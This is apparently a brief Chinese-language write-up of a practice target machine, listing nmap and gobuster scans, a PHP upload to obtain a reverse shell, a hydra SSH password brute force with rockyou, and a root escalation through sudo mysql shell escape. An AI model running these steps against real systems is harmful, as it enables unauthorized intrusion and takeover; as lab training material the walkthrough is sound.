1.浏览器输入目标靶机IP地址浏览网页

2.端口扫描

nmap -p- 192.168.31.128
nmap -sC  -sV -p 22,80 192.168.31.128

3.目录枚举
目录枚举的时候找到了一个有意思的mini.php目录

gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt

4.在浏览器打开mini.php,经过测试可以上传.php文件

上传php文件，反弹shell

5.在/home目录下发现存在五个用户，使用暴力破解得出goat用户的SSH登录密码

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.31.128  ssh 

6.ssh登录系统之后，使用sudo -l命令发现可以使用mysql提权
使用提权语句 mysql -e '\! /bin/bash'成功获取root权限

最后，谢谢大家伙百忙之中观看我的文章。